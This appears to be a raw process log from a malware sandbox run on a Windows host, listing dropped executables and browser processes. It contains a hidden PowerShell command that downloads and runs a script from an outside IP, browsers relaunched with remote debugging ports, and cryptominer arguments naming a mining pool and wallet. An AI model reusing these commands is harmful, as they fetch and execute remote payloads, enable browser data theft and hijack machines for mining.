"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3832,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4924 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5024,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4824 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4768,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4924 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5144,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5140 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4760,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5236 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5356,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5344 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe
"C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9ac3246f8,0x7ff9ac324708,0x7ff9ac324718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,2608537558221568348,5947771980609798483,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,2608537558221568348,5947771980609798483,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,2608537558221568348,5947771980609798483,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2172,2608537558221568348,5947771980609798483,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2172,2608537558221568348,5947771980609798483,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2172,2608537558221568348,5947771980609798483,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2172,2608537558221568348,5947771980609798483,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F9B2.tmp\F9B3.tmp\F9B4.bat C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff99686cc40,0x7ff99686cc4c,0x7ff99686cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2028,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2024 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1832,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2084 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1620,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2496 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3252 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4460,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4464 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4656,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4696 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4648,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4704 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4872,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4988 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6016 -ip 6016
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 788
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4944,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5160 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5360,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5372 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5160,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5288 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5388,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5500 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5576,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5572 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5416,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5552 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5764 -ip 5764
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5764 -s 792
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9914e46f8,0x7ff9914e4708,0x7ff9914e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ntpfhbq2\ntpfhbq2.cmdline"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2480 /prefetch:2
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4B8B.tmp" "c:\Users\Admin\AppData\Local\Temp\ntpfhbq2\CSCB7AF5E2C67F1428B9E672F2429D6693D.TMP"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4844 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2224 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4820 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=1976 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5188 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe"
C:\Windows\System32\notepad.exe
--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
C:\Users\Admin\AppData\Local\Temp\10110260101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10110260101\Ps7WqSx.exe"
C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe
"C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 960"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff99db4cc40,0x7ff99db4cc4c,0x7ff99db4cc58
C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe
